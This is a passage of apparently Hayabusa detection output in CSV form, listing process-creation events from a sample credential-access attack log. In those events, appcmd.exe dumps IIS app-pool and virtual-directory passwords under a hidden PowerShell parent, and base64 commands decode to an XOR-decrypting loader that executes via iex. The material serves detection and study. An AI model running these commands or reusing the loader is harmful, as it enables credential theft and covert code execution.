AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfA